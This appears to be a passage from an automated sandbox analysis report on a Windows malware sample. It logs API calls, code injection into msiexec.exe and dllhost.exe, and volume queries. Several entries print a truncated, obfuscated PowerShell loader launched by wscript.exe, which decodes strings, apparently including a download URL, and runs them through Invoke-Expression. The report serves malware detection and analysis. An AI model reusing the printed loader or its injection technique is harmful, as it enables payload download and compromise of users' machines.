Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtReadVirtualMemory: Direct from: 0x76F02E8C Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtCreateKey: Direct from: 0x76F02C6C Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtSetInformationThread: Direct from: 0x76F02B4C Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtQueryAttributesFile: Direct from: 0x76F02E6C Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtQuerySystemInformation: Direct from: 0x76F048CC Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtOpenSection: Direct from: 0x76F02E0C Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtSetInformationThread: Direct from: 0x76EF63F9 Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtCreateFile: Direct from: 0x76F02FEC Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtOpenFile: Direct from: 0x76F02DCC Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtQueryInformationToken: Direct from: 0x76F02CAC Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtOpenKeyEx: Direct from: 0x76F02B9C Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtSetInformationProcess: Direct from: 0x76F02C5C Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtNotifyChangeKey: Direct from: 0x76F03C2C Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtCreateMutant: Direct from: 0x76F035CC Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtMapViewOfSection: Direct from: 0x76F02D1C Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtResumeThread: Direct from: 0x76F036AC Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtReadFile: Direct from: 0x76F02ADC Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtQuerySystemInformation: Direct from: 0x76F02DFC Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtDelayExecution: Direct from: 0x76F02DDC Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtQueryInformationProcess: Direct from: 0x76F02C26 Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtResumeThread: Direct from: 0x76F02FBC Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe NtCreateUserProcess: Direct from: 0x76F0371C Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe Section loaded: NULL target: C:\Windows\SysWOW64\dllhost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: NULL target: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: NULL target: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2E00000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUn Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe Process created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\SysWOW64\dllhost.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#bishoping kropsvisitering privateje espying genes gossipingly #>;$scarifies117='sammensnredes';<#barometriske sardanapalian customiser miljteknikeren unwritten #>;$abovedeck=$autografsamlers+$host.ui; function plumet($pendultrafik){if ($abovedeck) {$beedigelsers++;}$superinsistently=$proelectric+$pendultrafik.'length'-$beedigelsers; for( $melolonthine=5;$melolonthine -lt $superinsistently;$melolonthine+=6){$swiveleye=$melolonthine;$warks+=$pendultrafik[$melolonthine];$unconservatively='mongolism';}$warks;}function extralegal($bostter){ & ($forfdrenes) ($bostter);}$reservationsslipper=plumet 'wgstrmboyarokujonzcorpsirediglfo melnon,oabened/mah r ';$reservationsslipper+=plumet 'lsesu5knubs. cl p0tidv. s til(.esknw indii rosn lyindflaunokoncewaugmespanto reknonhvekotfila kniks1dolkh0apnea. ilja0quali;b lki hjallw,plinir facn g.no6r,lak4zygne;glend retrxassur6bibli4s.ear; mask camstrrekorv taxi:ensky1udste3nob l1tempt.hamar0del b)perp pharmgunbusenyas,c ontok aurioemitt/kofan2udrik0indig1 plug0ove,f0 resp1godke0fiske1bicyc frerf econi .ermrrek.neagatefn touo.ulfaxtenni/,rriv1 d ta3ind.u1knapp.vin.i0fldei ';$feriegiroens=plumet 'vankeu ba ysdiarte stanrhaand- am aakartog gr se alannberustoleac ';$halmknippernes=plumet ' astahbaglyt kon tstripp.attlsk.teg:glade/bet l/pr mudvampertelexi derivg usceduple.spillgodorsohebraokupingin talstrikesla.e. vi ecsamenob,rbim ngle/ elemu,rfevcdress?a rile in.uxo scuptympaopaastrreroltaerop=sponsdtangio sidewcondon.ivilltilkmoki.ofavarsedunm.n&bluebigainlddisgu=u,der1katsuqsamsi6udtagcperfeyt end4me ryofarveurepartallobc cu lolact.u anve- bil.a skypv shinhlargiawhisk3 goom_unin v baffuleftiuceritu gallrkredifrisikoemb oonavewb agesqkanurcharanrdaghod cod 8touch ';$unpredicableness=plumet 'rvert>oshac ';$forfdrenes=plumet 'elu iiren.eedisruxpreda ';$melolonthinetalianation='synentognath';$klagen142='\gesjftigere.sig';extralegal (plumet ' kant$ gestg,opovlafrivo gar bafkrya nil lf rpe:acculscounttfederetabulnsubeno hoo tunvityu,eskp begrik prosexcertsoun.=ut,li$spencerascanshittvba uq:czecha knuspgerrhp.ositdfefniacor ntupdivapilsn+stf,o$statukbort lbytniau calg.ubsiefolkenkosmo1af,ik4t att2 vacc ');extralegal (plumet 'ekstr$time grenegltriesoparjrbev gha photlopt d:nonrek h veaanatol concltha lienslaganti rso staf,ypafrokkeiperig= b un$botchhbl frashriml mentmcitroks,ntin ammeioverpp arplpautheeeuroprtankenbiko,etildnscong .angorsr velpspattlpredei handtkl,ss( svag$opholustrafn vasop mosarprimaenor idraa lislutdcdicala unmebskravlfeas,einf rndr tte lamaspre.oshandl)carra ');extralegal (plumet 'kofil[replanbestresuppetdovec.skattsvarieeforklr entevh,andieu ogcopm ge ussp sociodeuteistud,nhundetrhabdm blseavivi.n udnva anarg,istieabomarprear]ung d:chond: u bysvinylebirkec fi mugavagrrevanizo.retsistsyplastpoptimrmaleno decrteks.oo ,ncachal hojereel wame premu=degra enspn[ u buna omae libatun
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#bishoping kropsvisitering privateje espying genes gossipingly #>;$scarifies117='sammensnredes';<#barometriske sardanapalian customiser miljteknikeren unwritten #>;$abovedeck=$autografsamlers+$host.ui; function plumet($pendultrafik){if ($abovedeck) {$beedigelsers++;}$superinsistently=$proelectric+$pendultrafik.'length'-$beedigelsers; for( $melolonthine=5;$melolonthine -lt $superinsistently;$melolonthine+=6){$swiveleye=$melolonthine;$warks+=$pendultrafik[$melolonthine];$unconservatively='mongolism';}$warks;}function extralegal($bostter){ & ($forfdrenes) ($bostter);}$reservationsslipper=plumet 'wgstrmboyarokujonzcorpsirediglfo melnon,oabened/mah r ';$reservationsslipper+=plumet 'lsesu5knubs. cl p0tidv. s til(.esknw indii rosn lyindflaunokoncewaugmespanto reknonhvekotfila kniks1dolkh0apnea. ilja0quali;b lki hjallw,plinir facn g.no6r,lak4zygne;glend retrxassur6bibli4s.ear; mask camstrrekorv taxi:ensky1udste3nob l1tempt.hamar0del b)perp pharmgunbusenyas,c ontok aurioemitt/kofan2udrik0indig1 plug0ove,f0 resp1godke0fiske1bicyc frerf econi .ermrrek.neagatefn touo.ulfaxtenni/,rriv1 d ta3ind.u1knapp.vin.i0fldei ';$feriegiroens=plumet 'vankeu ba ysdiarte stanrhaand- am aakartog gr se alannberustoleac ';$halmknippernes=plumet ' astahbaglyt kon tstripp.attlsk.teg:glade/bet l/pr mudvampertelexi derivg usceduple.spillgodorsohebraokupingin talstrikesla.e. vi ecsamenob,rbim ngle/ elemu,rfevcdress?a rile in.uxo scuptympaopaastrreroltaerop=sponsdtangio sidewcondon.ivilltilkmoki.ofavarsedunm.n&bluebigainlddisgu=u,der1katsuqsamsi6udtagcperfeyt end4me ryofarveurepartallobc cu lolact.u anve- bil.a skypv shinhlargiawhisk3 goom_unin v baffuleftiuceritu gallrkredifrisikoemb oonavewb agesqkanurcharanrdaghod cod 8touch ';$unpredicableness=plumet 'rvert>oshac ';$forfdrenes=plumet 'elu iiren.eedisruxpreda ';$melolonthinetalianation='synentognath';$klagen142='\gesjftigere.sig';extralegal (plumet ' kant$ gestg,opovlafrivo gar bafkrya nil lf rpe:acculscounttfederetabulnsubeno hoo tunvityu,eskp begrik prosexcertsoun.=ut,li$spencerascanshittvba uq:czecha knuspgerrhp.ositdfefniacor ntupdivapilsn+stf,o$statukbort lbytniau calg.ubsiefolkenkosmo1af,ik4t att2 vacc ');extralegal (plumet 'ekstr$time grenegltriesoparjrbev gha photlopt d:nonrek h veaanatol concltha lienslaganti rso staf,ypafrokkeiperig= b un$botchhbl frashriml mentmcitroks,ntin ammeioverpp arplpautheeeuroprtankenbiko,etildnscong .angorsr velpspattlpredei handtkl,ss( svag$opholustrafn vasop mosarprimaenor idraa lislutdcdicala unmebskravlfeas,einf rndr tte lamaspre.oshandl)carra ');extralegal (plumet 'kofil[replanbestresuppetdovec.skattsvarieeforklr entevh,andieu ogcopm ge ussp sociodeuteistud,nhundetrhabdm blseavivi.n udnva anarg,istieabomarprear]ung d:chond: u bysvinylebirkec fi mugavagrrevanizo.retsistsyplastpoptimrmaleno decrteks.oo ,ncachal hojereel wame premu=degra enspn[ u buna omae libatun
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#bishoping kropsvisitering privateje espying genes gossipingly #>;$scarifies117='sammensnredes';<#barometriske sardanapalian customiser miljteknikeren unwritten #>;$abovedeck=$autografsamlers+$host.ui; function plumet($pendultrafik){if ($abovedeck) {$beedigelsers++;}$superinsistently=$proelectric+$pendultrafik.'length'-$beedigelsers; for( $melolonthine=5;$melolonthine -lt $superinsistently;$melolonthine+=6){$swiveleye=$melolonthine;$warks+=$pendultrafik[$melolonthine];$unconservatively='mongolism';}$warks;}function extralegal($bostter){ & ($forfdrenes) ($bostter);}$reservationsslipper=plumet 'wgstrmboyarokujonzcorpsirediglfo melnon,oabened/mah r ';$reservationsslipper+=plumet 'lsesu5knubs. cl p0tidv. s til(.esknw indii rosn lyindflaunokoncewaugmespanto reknonhvekotfila kniks1dolkh0apnea. ilja0quali;b lki hjallw,plinir facn g.no6r,lak4zygne;glend retrxassur6bibli4s.ear; mask camstrrekorv taxi:ensky1udste3nob l1tempt.hamar0del b)perp pharmgunbusenyas,c ontok aurioemitt/kofan2udrik0indig1 plug0ove,f0 resp1godke0fiske1bicyc frerf econi .ermrrek.neagatefn touo.ulfaxtenni/,rriv1 d ta3ind.u1knapp.vin.i0fldei ';$feriegiroens=plumet 'vankeu ba ysdiarte stanrhaand- am aakartog gr se alannberustoleac ';$halmknippernes=plumet ' astahbaglyt kon tstripp.attlsk.teg:glade/bet l/pr mudvampertelexi derivg usceduple.spillgodorsohebraokupingin talstrikesla.e. vi ecsamenob,rbim ngle/ elemu,rfevcdress?a rile in.uxo scuptympaopaastrreroltaerop=sponsdtangio sidewcondon.ivilltilkmoki.ofavarsedunm.n&bluebigainlddisgu=u,der1katsuqsamsi6udtagcperfeyt end4me ryofarveurepartallobc cu lolact.u anve- bil.a skypv shinhlargiawhisk3 goom_unin v baffuleftiuceritu gallrkredifrisikoemb oonavewb agesqkanurcharanrdaghod cod 8touch ';$unpredicableness=plumet 'rvert>oshac ';$forfdrenes=plumet 'elu iiren.eedisruxpreda ';$melolonthinetalianation='synentognath';$klagen142='\gesjftigere.sig';extralegal (plumet ' kant$ gestg,opovlafrivo gar bafkrya nil lf rpe:acculscounttfederetabulnsubeno hoo tunvityu,eskp begrik prosexcertsoun.=ut,li$spencerascanshittvba uq:czecha knuspgerrhp.ositdfefniacor ntupdivapilsn+stf,o$statukbort lbytniau calg.ubsiefolkenkosmo1af,ik4t att2 vacc ');extralegal (plumet 'ekstr$time grenegltriesoparjrbev gha photlopt d:nonrek h veaanatol concltha lienslaganti rso staf,ypafrokkeiperig= b un$botchhbl frashriml mentmcitroks,ntin ammeioverpp arplpautheeeuroprtankenbiko,etildnscong .angorsr velpspattlpredei handtkl,ss( svag$opholustrafn vasop mosarprimaenor idraa lislutdcdicala unmebskravlfeas,einf rndr tte lamaspre.oshandl)carra ');extralegal (plumet 'kofil[replanbestresuppetdovec.skattsvarieeforklr entevh,andieu ogcopm ge ussp sociodeuteistud,nhundetrhabdm blseavivi.n udnva anarg,istieabomarprear]ung d:chond: u bysvinylebirkec fi mugavagrrevanizo.retsistsyplastpoptimrmaleno decrteks.oo ,ncachal hojereel wame premu=degra enspn[ u buna omae libatun Jump to behavior
Source: nJPhzxOixucOn.exe, 0000000A.00000002.2966048135.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000A.00000000.2702846325.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000000.2869395888.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: nJPhzxOixucOn.exe, 0000000A.00000002.2966048135.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000A.00000000.2702846325.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000000.2869395888.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: nJPhzxOixucOn.exe, 0000000A.00000002.2966048135.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000A.00000000.2702846325.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000000.2869395888.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: nJPhzxOixucOn.exe, 0000000A.00000002.2966048135.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000A.00000000.2702846325.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000000.2869395888.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
